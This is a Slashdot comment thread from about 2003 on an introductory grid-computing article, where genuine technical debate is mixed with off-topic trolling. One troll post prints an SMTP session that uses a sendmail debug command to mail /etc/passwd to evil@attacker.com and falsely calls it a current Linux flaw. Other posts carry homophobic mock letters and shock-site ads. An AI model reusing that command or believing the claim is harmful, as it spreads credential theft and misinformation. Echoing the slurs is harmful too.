Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Grid Computing at a Glance

CmdrTaco posted more than 11 years ago | from the stuff-to-read dept.

Technology 96

An anonymous reader writes "Grid computing is the "next big thing," and this article's goal is to provide a "10,000-foot view" of key concepts. This article relates many Grid computing concepts to known quantities for developers, such as object-oriented programming, XML, and Web services. The author offers a reading list of white papers, articles, and books where you can find out more about Grid computing."

cancel ×

96 comments

Sorry! There are no comments related to the filter you selected.

fr1st ps0t (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#5930777)

I have succeeded!

Re:fr1st ps0t (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#5930786)

You HAVE succeeded, grasshopper! You have now qualified for the special drawing among fr1st ps0ters who will be selected to be "loved" in that special way by Steve Jobs, JUST LIKE CMDR TICK-OH!!! Keep watching this space to see if you have won!

Gentoo Zealot Translator (0, Funny)

Anonymous Coward | more than 11 years ago | (#5930787)

Official Gentoo-Linux-Zealot translator-o-matic

Gentoo Linux is an interesting new distribution with some great features. Unfortunately, it has attracted a large number of clueless wannabes and leprotards who absolutely MUST advocate Gentoo at every opportunity. Let's look at the language of these zealots, and find out what it really means...

"Gentoo makes me so much more productive."
"Although I can't use the box at the moment because it's compiling something, as it will be for the next five days, it gives me more time to check out the latest USE flags and potentially unstable optimisation settings."

"Gentoo is more in the spirit of open source!"
"Apart from Hello World in Pascal at school, I've never written a single program in my life or contributed to an open source project, yet staring at endless streams of GCC output whizzing by somehow helps me contribute to international freedom."

"I use Gentoo because it's more like the BSDs."
"Last month I tried to install FreeBSD on a well-supported machine, but the text-based installer scared me off. I've never used a BSD, but the guys on Slashdot say that it's l33t though, so surely I must be for using Gentoo."

"Heh, my system is soooo much faster after installing Gentoo."
"I've spent hours recompiling Fetchmail, X-Chat, gEdit and thousands of other programs which spend 99% of their time waiting for user input. Even though only the kernel and glibc make a significant difference with optimisations, and RPMs and .debs can be rebuilt with a handful of commands (AND Red Hat supplies i686 kernel and glibc packages), my box MUST be faster. It's nothing to do with the fact that I've disabled all startup services and I'm running BlackBox instead of GNOME or KDE."

"...my Gentoo Linux workstation..."
"...my overclocked AMD eMachines box from PC World, and apart from the third-grade made-to-break components and dodgy fan..."

"You Red Hat guys must get sick of dependency hell..."
"I'm too stupid to understand that circular dependencies can be resolved by specifying BOTH .rpms together on the command line, and that problems hardly ever occur if one uses proper Red Hat packages instead of mixing SuSE, Mandrake and Joe's Linux packages together (which the system wasn't designed for)."

"All the other distros are soooo out of date."
"Constantly upgrading to the latest bleeding-edge untested software makes me more productive. Never mind the extensive testing and patching that Debian and Red Hat perform on their packages; I've just emerged the latest GNOME beta snapshot and compiled with -O9 -fomit-instructions, and it only crashes once every few hours."

"Let's face it, Gentoo is the future."
"OK, so no serious business is going to even consider Gentoo in the near future, and even with proper support and QA in place, it'll still eat up far too much of a company's valuable time. But this guy I met on #animepr0n is now using it, so it must be growing!"

-

Re:Gentoo Zealot Translator (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#5930811)

haha! Great stuff :-D

Re:Gentoo Zealot Translator (0)

Anonymous Coward | more than 11 years ago | (#5934851)

dude, i use gentoo for a year now and love, but this shite is funny! propz to you. sorry for my non-native enlish@

Selling your cycles (4, Interesting)

shokk (187512) | more than 11 years ago | (#5930796)

And with this change in computing comes another challenge. Not every company has applications that would benefit from distributed computing, but many do. The challenge is making a secure environment that will allow Company A to send their data *and* the software to process that data down the pipe to Company B for processing, meter the usage, and charge back the service. From what I have seen, no farm is really ever utilized 100% of the time, but there are crunch periods where something has to be simulated within a certain timeframe and the existing throughput on hand is not enough. It is those crunch times where you could really use a few trillion spare cycles.

it's not all about the cycles (5, Insightful)

kcm (138443) | more than 11 years ago | (#5930834)

Grid computing is not about making a giant computing farm out of a bunch of distributed machines.

see, that's the major fallacy of the hype behind "The Grid". yes, one of the benefits can be seen in the supercomputing realm, where you can link up many different machines (we haven't gotten to doing this between architectures yet, mind you) to make a gianto-machine.

however, the key in *all* of this is the technologies that allow for that to happen, along with the data transfer, authentication, and authorization, et al, that have to happen.

as far as cycles go, no, we probably won't see a dynamically created, scheduled, and allocated meta-supercomputer anytime soon. most companies will use these technologies to make static or mostly-static links between a few select sites and partners for now.

however, these protocols (GridFTP, ack), standards (OGSA, ...), and ideas are the important part here. having these "Grid" concepts built into every new technology (filesystems: NFSv4, security: Globus GSI, etc.) will allow these linkups, data transfer, and whatever we may awnt to do, to happen much more efficiently in the future.

to wit: the killer app in "The Grid" is not to make a giant supercomputer. it's to develop a lot of different ideas and technologies which allow for resource sharing (at the general level, among other things) to occur in a standardized, efficient, and logical fashion in the future. noone will use all of them, but the key is to use what you need from what "The Grid" encompasses. that's why it's referred to as "The Third Wave of Computing"!

Re:it's not all about the cycles (3, Informative)

SilverSun (114725) | more than 11 years ago | (#5931121)


Grid computing is not about making a giant computing farm out of a bunch of distributed machines.


Make that "not" a "not only", and I totally agree with you. See, I work with EDG (european data grid, based e.g. on Globus authentication) on a daly basis. And for us it is merely a tool to make exactly that, namely a giant computing farm out of our computing farms in USA, UK, France, and Germany. It really sucks to log into all our datacenters and see where the batch queues are least utilizised. With the grid, all our batch farms look like a single farm and I just submit my job and don't need to care where in the world it is running. That is exactly the small part of the "Grid" cloud which we are picking for us.


Now to the cycle based selling of our spare time. You would be surprized to hear how many hours I spend a week to implement exactly this. The finance department calculated the prize of lost cycles our farm had the last quartal and it will probably pay out for us to spent 0.5 FullTimeEmployees to work on trying to sell those on a three years timescale.


There are many aspects of "Grid Computing", as you say, but most if not all of them are based on large scale science projects (me) or on big business. I am most curious to see if Grid computing will eventually find it's way to a home user. I heard that Sony is using Grid tech. to connect computing centers which are supposed to host multi-player games. The home user will most likely not get in touch with the Grid soon though.

Cheers

Re:it's not all about the cycles (1)

kcm (138443) | more than 11 years ago | (#5931253)

There are many aspects of "Grid Computing", as you say, but most if not all of them are based on large scale science projects (me) or on big business. I am most curious to see if Grid computing will eventually find it's way to a home user. I heard that Sony is using Grid tech. to connect computing centers which are supposed to host multi-player games. The home user will most likely not get in touch with the Grid soon though.


yup. i don't expect mr. home user to use "the grid" any more than I expect him to use Linux on the desktop. indirectly, yes, but to use an example from the P2P world -- he doesn't care if his porn comes at him with swarming technology or not, as long as it's fast!

Re:it's not all about the cycles (1)

SilverSun (114725) | more than 11 years ago | (#5931311)

Well, make that interactive porn where the actor AI is powered by computing GRIDs and we might have something for he home user.. err... well.. then again, the amount of artificial inteligence you need to simulate a porn actor probably fits into your toaster by the end of the year...

Re:it's not all about the cycles (1)

Scriven (123006) | more than 11 years ago | (#5939908)

AI Toaster Porn? Would that be like attaching a FUFMe to Talky the Toaster?

Re:it's not all about the cycles (1)

Dajur (168872) | more than 11 years ago | (#5931219)

"(we haven't gotten to doing this between architectures yet, mind you)"


Mabye you havn't heard of PVM [ornl.gov] or MPI [anl.gov] .

Re:it's not all about the cycles (1)

kcm (138443) | more than 11 years ago | (#5931241)

I'm quite familiar with both, thanks. I'm referring to something slightly more sophisticated and elegant than trying to kludge together MPICH-G2 with a bunch of different binaries for whatever machines you have to hand-select beforehand.

neither of these allow for an autonomous, dynamic, automatic architecture-spanning system. yet.

Re:it's not all about the cycles (1, Insightful)

Anonymous Coward | more than 11 years ago | (#5932255)

Ok Mr Buzz Word, I don't know what you mean by autonomous, dynamic, or automatic architecture-spanning. Please explain what all of this sophisticated elegance is.

Re:it's not all about the cycles (1)

shokk (187512) | more than 11 years ago | (#5932323)

What he means is that you can run anything anywhere anytime without having to go around loading "Software Package B 2.3" at every server farm that will ever encounter your job. It will not matter whether you are running on Win32, Linux, HP-UX, or Atari 2600; the architecture should be an abstract concept many levels down that the grid user should ignore.

This is much like a lot of the distributed computing systems out there these days. I don't think Folding@Home cares whether you ran their work unit on a Red Hat box or on Solaris sparc systems.

Re:it's not all about the cycles (2, Interesting)

shokk (187512) | more than 11 years ago | (#5932306)

A lot of these concepts are what we are waiting for. We have a server farm that is metered by resources available from license servers, but the data is geographically separated so licenses available at one site may not be available at others. Technologies that allow reliable data transfer (NFSv4?) might enable this, but it also needs to be calculated whether the amount of time it takes to transfer the data will be longer than it takes to process the data. Not all our sites have multiple T1s so it may be cheaper to just boost the size of those lines vs buying $100k licenses. Total grid computing sounds very possible when you talk about breaking the job down to "Add register 1 and register 2" but the task of breaking the job down to that size and transferring to a remote system canh take so much longer than actually doing that locally. Some larger granularity will be needed to make it efficient to transfer a job remotely.

As I mentioned in my post, "secure" handling would be the first requirement. Security and encryption must go without saying. In order to further ensure security, a job must be as widely spread as possible. If I split an aerodynamic simulation in encrypted fashion across 100 compute farm services I am much more secure than if I did the same thing with a single service.

Re:Selling your cycles (1)

vidarlo (134906) | more than 11 years ago | (#5931520)

This has not got anything with the principe behind it, but: I would be *very* afraid of spyes...If I send my data for processing over to a remote system, it means they can have access. If I where designing a new car and calculating aeordynamic data, I would certainly calculate it on a system entirely controlled by me. Before we can get to the step of full grids, all over the world, we have make a system that ensures that the "B" in this example, can't copy, read, or in any way gain access to your information. Information is in many matters power. Power over car-buyers, power over nations if it's weapons and so on. No one gives away power, and is *paying* (supposing you're paying for the cycles) someone to grab it! So the security needs to be taken in care, and we must make that solid system, that malicous users can't do much (read: none) damage.

Re:Selling your cycles (1)

zzyp (659456) | more than 11 years ago | (#5931940)

I am thinking of using old computers with 128Mb in our school which are upgraded once every 3-5 years for this concept in everyday open source applications. But Grid Iron Software [gridironsoftware.com] hasn't yet replied to my email.

Sigh, anyway I will try again next week, and if they dont bother with it I will try some other outfit.

Re:Selling your cycles (1)

shokk (187512) | more than 11 years ago | (#5932353)

Take a look at a company called RTDA [rtda.com] . We use their Flowtracer/NC product with its FlexLM license tracking.

Re:Selling your cycles (1)

zzyp (659456) | more than 11 years ago | (#5934360)

Thanks for the heads up!

Is their product in C or Java?

Re:Selling your cycles (1)

shokk (187512) | more than 11 years ago | (#5947552)

C and Tcl

Next big thing? Again? (3, Funny)

skaffen42 (579313) | more than 11 years ago | (#5930798)

Grid computing is the "next big thing"

But I thought that this [slashdot.org] was the next "killer app"?

Re:Next big thing? Again? (1)

keller (267973) | more than 11 years ago | (#5930941)

Well the next "killer app", needs a platform / framework to run on. So the next "killer app" should of course run on the next "big thing" they are not mutually exclusive!

Dear Apple (-1, Troll)

Anonymous Coward | more than 11 years ago | (#5930800)

Dear Apple,

I am a homosexual. I bought an Apple computer because of its well earned reputation for being "the" gay computer. Since I have become an Apple owner, I have been exposed to a whole new world of gay friends. It is really a pleasure to meet and compute with other homos such as myself. I plan on using my new Apple computer as a way to entice and recruit young schoolboys into the homosexual lifestyle; it would be so helpful if you could produce more software which would appeal to young boys. Thanks in advance.

with much gayness,

Father Randy "Pudge" O'Day, S.J.

Brock Lesnar vs. Grid Computing (-1)

Anonymous Coward | more than 11 years ago | (#5930803)

WWE claimed Brock Lesnar as the "Next Big Thing." And, frankly, I'm not sure if Grid Computing can live up to this title now. Is Grid Computing over 300lbs? No. An NCAA champ? No. Does Grid Computing eat babies? No. In conclusion, Grid Computing is not the "Next Big Thing." Thank you.

Social Software (1, Funny)

Anonymous Coward | more than 11 years ago | (#5930804)

I thought Social Software was the next big thing

No. THIS is the NEXT BIG THING (-1)

Anonymous Coward | more than 11 years ago | (#5930830)

Are you bright? witty? Do you have friends that laugh at your jokes? We at lrse hosting" [lrsehosting.com] are looking for a select few individuals to join our ranks at the internet's premier source of wit [sporks-r-us.com] and style [geekizoid.com] .

Do YOU have what it takes? Register TODAY and FIND OUT!!!!

Re:Social Software (0)

Anonymous Coward | more than 11 years ago | (#5930839)

In a couple years, Social Security will be the next big thing for my wallet.

TROLLING at a GLANCE: (-1, Troll)

Anonymous Coward | more than 11 years ago | (#5930819)

Would you like to read more trolls in your spare time? Sure, we all do. That's why we founded goatse info [goatse.info] , where YOU get to rub elbows with all the ORIGINAL trolling greats!

Would YOU like to:

Trade segregation stories with Strom Thurmond ?

Share stalking tips with Marko?

Laugh at the preteen antics of Unterderbrucke?

Keep up to date with the latest Perl stylings of Sexual Asspussy?

Then come on down to Goatse Info [goatse.info] . Where we're stretching the limits of crap flooding!

Dear Father Randy O'Day (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#5930821)

Dear Father O'Day:

Thanks for your letter. Being Catholic myself, I know exactly what you're talking about! It has always been our plan here at Apple Computer Inc to revolutionize personal computing with our high-quality and highly gay products.

I'm happy to answer your letter by letting you know that YES we will be releasing an entire hLife ("homo-life") software line. You'll be able to recognize it in stores by the small stylized logo depicting a large cock entering a tight anus with an Apple logo on it. ("Suddenly it all comes together" indeed!).

Anyway, I hope you and other members of our community will join us on our mission, and purchase the exciting new hLife boxed set. Only the boxed set comes with translucent cock rings!

Sincerely,

Harry Rodman
Vice-president
Homosexual Liaison Services
Apple Computer, Inc.

*BSD is dying (-1, Troll)

Anonymous Coward | more than 11 years ago | (#5930838)

It is official; Netcraft now confirms: *BSD is dying

One more crippling bombshell hit the already beleaguered *BSD community when IDC confirmed that *BSD market share has dropped yet again, now down to less than a fraction of 1 percent of all servers. Coming on the heels of a recent Netcraft survey which plainly states that *BSD has lost more market share, this news serves to reinforce what we've known all along. *BSD is collapsing in complete disarray, as fittingly exemplified by failing dead last [samag.com] in the recent Sys Admin comprehensive networking test.

You don't need to be a Kreskin [amazingkreskin.com] to predict *BSD's future. The hand writing is on the wall: *BSD faces a bleak future. In fact there won't be any future at all for *BSD because *BSD is dying. Things are looking very bad for *BSD. As many of us are already aware, *BSD continues to lose market share. Red ink flows like a river of blood.

FreeBSD is the most endangered of them all, having lost 93% of its core developers. The sudden and unpleasant departures of long time FreeBSD developers Jordan Hubbard and Mike Smith only serve to underscore the point more clearly. There can no longer be any doubt: FreeBSD is dying.

Let's keep to the facts and look at the numbers.

OpenBSD leader Theo states that there are 7000 users of OpenBSD. How many users of NetBSD are there? Let's see. The number of OpenBSD versus NetBSD posts on Usenet is roughly in ratio of 5 to 1. Therefore there are about 7000/5 = 1400 NetBSD users. BSD/OS posts on Usenet are about half of the volume of NetBSD posts. Therefore there are about 700 users of BSD/OS. A recent article put FreeBSD at about 80 percent of the *BSD market. Therefore there are (7000+1400+700)*4 = 36400 FreeBSD users. This is consistent with the number of FreeBSD Usenet posts.

Due to the troubles of Walnut Creek, abysmal sales and so on, FreeBSD went out of business and was taken over by BSDI who sell another troubled OS. Now BSDI is also dead, its corpse turned over to yet another charnel house.

All major surveys show that *BSD has steadily declined in market share. *BSD is very sick and its long term survival prospects are very dim. If *BSD is to survive at all it will be among OS dilettante dabblers. *BSD continues to decay. Nothing short of a miracle could save it at this point in time. For all practical purposes, *BSD is dead.

Fact: *BSD is dying

I can see it now... (3, Interesting)

newsdee (629448) | more than 11 years ago | (#5930844)

1. e-mails with "EARN $$$ DOING NOTHING"
2. spyware that not only spies but also hijacks your CPU cycles for remote computation
3. dubious companies selling "grid computing" service pop up all over the place
4. ...
5. Profit?

It may look funny, but what if the next version of Windows comes embedded with this kind of thing? All it would take would be some marketing genius to convince enough people. (disclaimer: yes this is slightly paranoid, it's not intended to be MS bashing, just an example on how this technology could be misused).

if you want to talk profit! come on down (-1, Troll)

Anonymous Coward | more than 11 years ago | (#5930892)

to trollaxor's place. [trollaxor.com] Where old trolls are new again!

Re:if you want to talk profit! come on down (0)

Anonymous Coward | more than 11 years ago | (#5932003)

stupid picutres :-)

Re:I can see it now... (1)

Realistic_Dragon (655151) | more than 11 years ago | (#5931745)

"It may look funny, but what if the next version of Windows comes embedded with this kind of thing?"

It already comes with an enabling technology - the Outlook Express Scripting Engine.

Possibly one day it'll be more lucrative to exploit OE for grid computing than for opening a SMTP relay - then we will know that it has really arrived as a mature technology.

Patriot@Home (1)

Becquerel (645675) | more than 11 years ago | (#5933422)

The projects that the grid is best at are pretty much the areas that already have 'grid' projects, biochemistry [grid.org] , genetics, SETI [berkeley.edu] and some maths problems. In which I include one of the most appropriate maths problems for the grid, is brute force password attack. How long before the US Gov. starts a Patriot@home grid to brute force any encrypted files it wants to see, in the name of homeland security...of course.

It Could be (1, Interesting)

the-dude-man (629634) | more than 11 years ago | (#5930847)

It really could be one of the next big things, considering the advent of Object oriented methods of handeling information it realistically could be a viable Object oriented model.

With The realitivly recent move of object oriented Programming, you could think of this as just the next level of abstraction, abstracting your objects out to a broader system level as apposed to an implemenatation level.

In Any event it would be a good scheme for many things that need distributed systems....such as cryptographic reaseach and other things that need to be distributed

Re:It Could be (2, Interesting)

adz (630844) | more than 11 years ago | (#5930964)

There was work on developing an OO style grid, but toolkit style grids (e.g.) globus seem more likely to enter general usage.

Basically the toolkit approach implements a low level set of common grid functionality, security, job monitoring, brokering etc, which is then leveraged by other apps.

Of course the toolkit can to some extent be wrapped in OO methods and abstracted away, but its not pure OO.

That's what happens when Computational Scientists are allowed to design things.

Re:It Could be (3, Insightful)

Anonymous Coward | more than 11 years ago | (#5931063)

Oh bullshit. Every layer of abstraction costs you.
The fact that desktop pc's are 5-20% utilized is why you can just claim another layer of abstraction won't hurt you.

--- now please go and find me a list of things that "needs distributed".

-- next from your list remove any jobs that do not parallelize in to chunks of data that can fit in common machines --- yes the grid will have some big boxen, but do you think you are going to reliably get farmed onto one of those?

-- next from the remainder that you have managed to parallelize into small chunks, please remove those in which the chunks have to have any significant interdependence because you don't have any control of the net-ography of the grid and latency will be a killer.

-- now remove any notion you have about "generic db queries" unless you are going to have many redundant db systems on the grid. If you don't have redundancy the network latency will kill you. If you do have redundancy and the db query is sufficently complex as to need service by something other than your desktop PC then you'll probably want some beefy hardware out there... which you want to use not necessarily share

-- what's left? Things that occur to me: analysis of nuclear and particle physics data (that's where the grid idea started!), genomics research, cryptography, SETI@home and whatever else @home. The key point is that none of these are applicable to corporate IT unless you are doing say genomics. Do you think that genomics resarch companies are going to ever allow their data to be handled outside a structure they can micro-manage -- there are giga-dollars at play.

The grid has it's place, but the myth of:
1)plug my computer into grid
2)have access to limitless resources
3)do amazing things

is as goofy as the dot-bomb business plans that forgot to figure out a $profit$ step.

If you aren't doing amazing things outside the grid what makes you think adding 10000x the horsepower will change anything. The grid is at best a tool. If it meets the needs of your niche market you win big. If your problem(s) don't fit the grid then you gain nothing.

Re:It Could be (1)

the-dude-man (629634) | more than 11 years ago | (#5931201)

Oh bullshit. Every layer of abstraction costs you.
The fact that desktop pc's are 5-20% utilized is why you can just claim another layer of abstraction won't hurt you.


Amzaing how some people can be so passionate yet know so little

we are talking about the concept here...not the individual implementations...ther are OO implementations (ie kde) that abstract out without preformance hits

Now go back to your single threaded world :)

Re:It Could be (1)

SilverSun (114725) | more than 11 years ago | (#5931206)

I am working on EDG (European Data Grid, particle physics)) and I totally agree with what you say, ... today ... but who knows what is tomorrow.

What you say has been said in an amazingly similar wording to WWW back in the days when we (High Energy physicists) developed the stuff at CERN.
HTML would be nice to excange scientific documentation and news, but no company would ever benefit from it, let alone home users.

Nowerdays everybody is using WWW. Industries rely on it. Maybe this will not happen to Grid tech but maybe your (and my) imagination is just too limited. We'll see.

Re:It Could be (1)

Becquerel (645675) | more than 11 years ago | (#5933404)

I agree, the people that need massive computing power now and in the near future are pretty much all running finite element analyses or similar (aero/hydrodynamics,nuclear explosion,climate, quantum physics,galaxy models). This method doesn't scale too badly on a supercomputer,but it relys on rapid and regular communication between processors in order to work efficiently, something which the grid (in a global sense) is unlikely to provide in the near future

This can be fixed... (0, Redundant)

Reblet (671563) | more than 11 years ago | (#5930850)

It's well known in industry circles that most desktop machines only use 5% to 10% of their capacity, and most servers barely peak out at 20%.
That 20% can easily be increased by posting a link on Slashdot. >:-)

Teen Trashes Science Exhibit (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#5930852)

CHICAGO (AP) 10 May 2003 - A 17-year-old girl was killed after she tried to slide down the railing of a staircase inside a museum, lost her balance and fell, police and museum officials said.

The accident happened in a public stairwell known as the "Blue Stairway" inside the Museum of Science and Industry.

"She was sliding down the bannister and lost her balance, according to eyewitness accounts," Chicago police spokesman Matthew Jackson said. "We are treating this as a death investigation."

The girl, identified as Katie Brooks, a student at Cor Jesu Academy in the St. Louis suburb of Affton, Mo., was part of a youth group of about 80 people, said museum spokesman Jim Macksood.

The Foucault's Pendulum exhibit located in the stairwell was damaged, and the surrounding area was closed, museum officials said. The rest of the museum remained open. Macksood said there was "no lingering danger" to other visitors.

"Museum officials called in crisis counselors to work with the other members of the youth group," he said.

David Mosena, president and CEO of the museum, released a statement saying: "Our thoughts and prayers are with the family and friends of the young woman."

Re:Teen Trashes Science Exhibit (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#5930884)

Ahhh, natural selection at work.

ALERT Linux users - README (-1, Flamebait)

Anonymous Coward | more than 11 years ago | (#5930854)

I have found a bug in most major Linux distros. It seems like someone forgot to remove the DEBUG flag when building sendmail - this allows me to Email myself your password and shadow file! Check it out -

220 mail.victim.com SMTP
helo attacker.com
250 Hello attacker.com, pleased to meet you.
debug
200 OK
mail from:
250 OK
rcpt to:
250 OK
data
354 Start mail input; end with .
mail evil@attacker.com /etc/passwd
.
250 OK
quit
221 mail.victim.com Terminating

I checked out Microsoft sendmail, and its not vulnerable. I suggest you switch before you get 0wn3d.

Re:ALERT Linux users - README (-1, Troll)

Anonymous Coward | more than 11 years ago | (#5930879)

That's ok. Since Debian, Redhat and the *BSDs all ship with Microsoft sendmail, the problem should be fairly small in scope.

Sucks to be a jen@t00 user right now, tho.

sourceforge? (1)

pphrdza (635063) | more than 11 years ago | (#5930859)

Sounds like sourceforge projects; especially the discussion on standards and protocols going on in oss4lib [sourceforge.net] right now.

hrm..... (0, Troll)

xao gypsie (641755) | more than 11 years ago | (#5930870)

it msut be late...or early. for a second, i thought i saw "girl computing...." and started thinking "wow, /. is getting a bit blunt these days....."

xao

Re:hrm..... (0)

Anonymous Coward | more than 11 years ago | (#5930897)

Mis-reading an article heading and then posting what you thought it was is not funny. It never was and it never will be. Grow the fuck up.

hrm..... (0)

Anonymous Coward | more than 11 years ago | (#5930939)

it msut be late...or early. for a second, i thought i saw "I'm so fucking funny - I can't read" and started thinking "wow, /. is getting a bit retarded these days....."

Re:hrm..... (0)

Anonymous Coward | more than 11 years ago | (#5930953)

xao, you are a cunt

NOT the next big thing (5, Funny)

Anonymous Coward | more than 11 years ago | (#5930893)

You obviously didn't get the memo

I happen to know that beowulf clusters of quantum iPods, built by nanobots, running social software, using a Post-OOP paradigm and a journaled filesystem over a wireless IPv6 network to make profit with a subscription-based publishing model will be the next big thing.

Re:NOT the next big thing (0)

Anonymous Coward | more than 11 years ago | (#5931209)

one question:

Will it enlarge my penis ?

Re:NOT the next big thing (1)

spongman (182339) | more than 11 years ago | (#5934372)

In Soviet Russia, the next big thing will be YOU!

so, yes.

Re:NOT the next big thing (0)

Anonymous Coward | more than 11 years ago | (#5934601)

In Soviet Russia, A Piers Haken Actually Programs YOU, not the usual non-Soviet Russia Piers Haken, which steals other people's ideas and code and calls them his own.

Re:NOT the next big thing itanium2 flaw. (0)

Anonymous Coward | more than 11 years ago | (#5940935)

Intel reveals Itanium 2 glitch
By Stephen Shankland Staff Writer, News.com May 12, 2003, 12:36 PM PT

CUSTOMERS TOLD TEMPORARY REMEDY: Until the next iteration of chip arrives though, Oliver Wendell Jones writes, "they recommend working around the problem

by underclocking the processor to run at 800 MHz instead of its default 900 MHz or 1 GHz."


Intel disclosed an electrical problem Monday that can cause computers using its flagship Itanium 2 processor to behave erratically or crash.
Read more about Itanium


Customers can sidestep the problem by setting the processor to run at a lower speed, said company spokeswoman Barbara Grimes, and Intel will replace the

processor if customers want. The glitch only affects some chips, and then only in the case of "a specific set of operations in a specific sequence with

specific data," according to Grimes.

"If the customer feels it's the right solution, we'll exchange processors with ones that aren't affected," she said. Intel has developed a simple software

test that can determine whether a chip is affected.

The problem likely is fairly uncommon, Insight 64 analyst Nathan Brookwood said. "These machines have been out there for a year, and it only now is showing

up, so it's got to be fairly rare. If it's something that was more commonplace, we would have seen it a lot sooner, or they would have found it in their

alpha or beta testing."

Still, the problem is a black eye for Intel, which has been positioning its Itanium line to take on high-end chips from Sun Microsystems and IBM for use in

powerful servers with dozens of processors.

"Virtually everybody has these kinds of problems," Brookwood said. "When you consider the hundreds of millions of transistors that go into these complex

designs, it's amazing we don't see these more often."

The Itanium 2 has data protection features and a 64-bit design that can handle vast amounts of memory, making it better suited to high-end servers than

32-bit processors such as Intel's Xeon and Pentium. Its performance has been good enough to boost Windows servers to the upper echelons of the server market,

but the processor family's arrival has been clouded by initial delays and by the difficulties of running software written for Pentium chips.

A computer maker found the electrical problem in stress testing earlier this year, and Intel confirmed it was a problem with the chips, not the software or

other parts of system design, Grimes said. The problem affects both 900MHz and 1GHz versions of the Itanium 2, code-named McKinley. However, it doesn't

affect a faster 1.5GHz successor--called Itanium 2 6M and formerly code-named Madison--that is set for release in mid-2003, she said.

The ripple effect
The problem has begun rippling through the computer industry. IBM said Monday that it has put shipments of its just-released x450 Itanium 2 server on hold

until the glitch is fixed and is notifying customers that have the systems.

"Until we're sure the issues are 100 percent resolved, we're going to keep holding back shipments with the 450," IBM spokeswoman Lisa Lanspery said. "We have

a policy of zero tolerance for undetected data corruption" at a customer site, she said.

The move doesn't affect IBM's overall Itanium plans, which include a server based on the Itanium 2 6M and planned for later in 2003, she said.

Hewlett-Packard, which co-developed the Itanium design and is building the processor family into its entire server line, said computer shipment plans aren't

affected because it's screening affected systems before they ship. The company is working to help customers that already bought the systems.

"We'll do whatever meets the customer's total satisfaction," said HP spokeswoman Kathy Sowards. "We're working very closely with Intel to come to a

resolution for any customers that may be affected."

But the glitch can't be good for server salespeople already trying to sell Itanium 2 servers with the more powerful Itanium 2 6M processors just around the

corner, Brookwood said.

"Imagine if you're trying to convince a customer to buy a McKinley-based system. Customers will say, 'Maybe I'll wait until Madison becomes available,'"

Brookwood said. One possible response is to offer McKinley systems with a free upgrade to Madison, he said.

Dell Computer's plans aren't affected, company spokesman Eric Anderson said. Dell plans to ship a dual-processor Itanium 2 6M system later this year.

To work around the problem, customers can turn the chip frequency down to 800MHz. "In our testing, the problem has not manifested itself when the frequency

is lower," Grimes said.

Intel has begun discussing plans with computer makers on how to deal with the problem, Grimes said.

"Some may decide the problem isn't manifesting itself" and therefore no action is needed, she said. "Others may decide to turn the frequency down as a

temporary solution until they can switch out the processors. Others may already have plans to do a free upgrade to Madison."

Intel has distributed to computer makers the software that can check for the problem. But the software test doesn't yield results as firm as Intel's own

manufacturing test, Grimes said.

Intel deserves no credit for its up-front dealings with the issue, Brookwood said. "When they discover this kind of stuff, they now understand how to deal

with it from an organizational standpoint in terms of getting the word out and working with (computer makers) to get the situation corrected in a timely

fashion," he said. "Nobody can accuse them of trying to sweep this under the rug."

Re:NOT the next big thing (0)

Anonymous Coward | more than 11 years ago | (#5933108)

I happen to know that beowulf clusters of quantum iPods, built by nanobots, running social software, using a Post-OOP paradigm and a journaled filesystem over a wireless IPv6 network to make profit with a subscription-based publishing model will be the next big thing.


Is it written with extreme programming using the latest agent-based design patterns and chaos theory to leverage the B2B industry whilst providing an acceptable return on investment minimizing capital expenditures?

And is it managed by a pointy haird boss?

More grid info (5, Interesting)

Anonymous Coward | more than 11 years ago | (#5930934)

Sun is heavily involved in Grid [sun.com] computing. They provide free multiplatform grid software (including for Linux), case studies, white papers, etc.

They also host an open source project Grid Engine [sunsource.net] for the software. The software used to be commercial, but Sun bought it and open sourced it, like they did with Open Office.

grid computing... (2, Interesting)

Connie_Lingus (317691) | more than 11 years ago | (#5930956)

sounds a lot like good 'ole fashioned SMP to me, with a lot more disk space. As we all here know, not all computer-related tasks work well in a multi-processor platform, and as someone who has played with SMP programming, it certainly adds an order-of-magnitude level of complexity to try to harness the full power of SMP in your code. Compilers help, but not much...

Re:grid computing... (1)

Tom7 (102298) | more than 11 years ago | (#5931163)

Well, it's definitely not symmetric.
It's more like "distributed computing." The granularity of parallelism is much, much larger than you'd get on an SMP architecture.

Re:grid computing... (0)

Anonymous Coward | more than 11 years ago | (#5952104)

Why was this modded down?

Re:grid computing... (0)

Anonymous Coward | more than 11 years ago | (#5931925)

You've managed to miss the point. Completely. If you read the IBM material and it wasn't clear, try Sun's [sun.com] material.

You're all wrong (1)

shaneb11716 (451351) | more than 11 years ago | (#5930982)

Neither this nor Social Computing is the next killer app... Social Grid Computing is.

Never mainstream (4, Insightful)

MobyDisk (75490) | more than 11 years ago | (#5931040)

This is just an inverted version of the "network computing" universe where we all use thin clients that use a central server to do work. It can never become mainstream due to the physical limitations, not the technology ones. Suppose I am a corporation and I need a new big-iron system to process daily orders from our web site. Let's try grid computing: all 1000 employees in the company install a piece of software on their PC so we can use each PC to process an order, based on availability. The number of problems with this, as compared to using a central server, is incredible.

1) Still need a central server for storage/backup
2) One server needs one UPS, 1000 workstations...
3) Worsktations are flaky: They reboot, crash, play video games, etc. The distributed software can handle this, but the inefficiency involved is painstaking. I hope everybody doesn't run Windows Update all at once, or all the PCs could go down.
4) The corporate network is now a bottleneck.

I rattled off this list in about 30 seconds, so I'm sure there are lots more. Since these are physical limitations, not technology limitations, they aren't going away.

No, this can be practical for many applications (1)

Tom7 (102298) | more than 11 years ago | (#5931191)


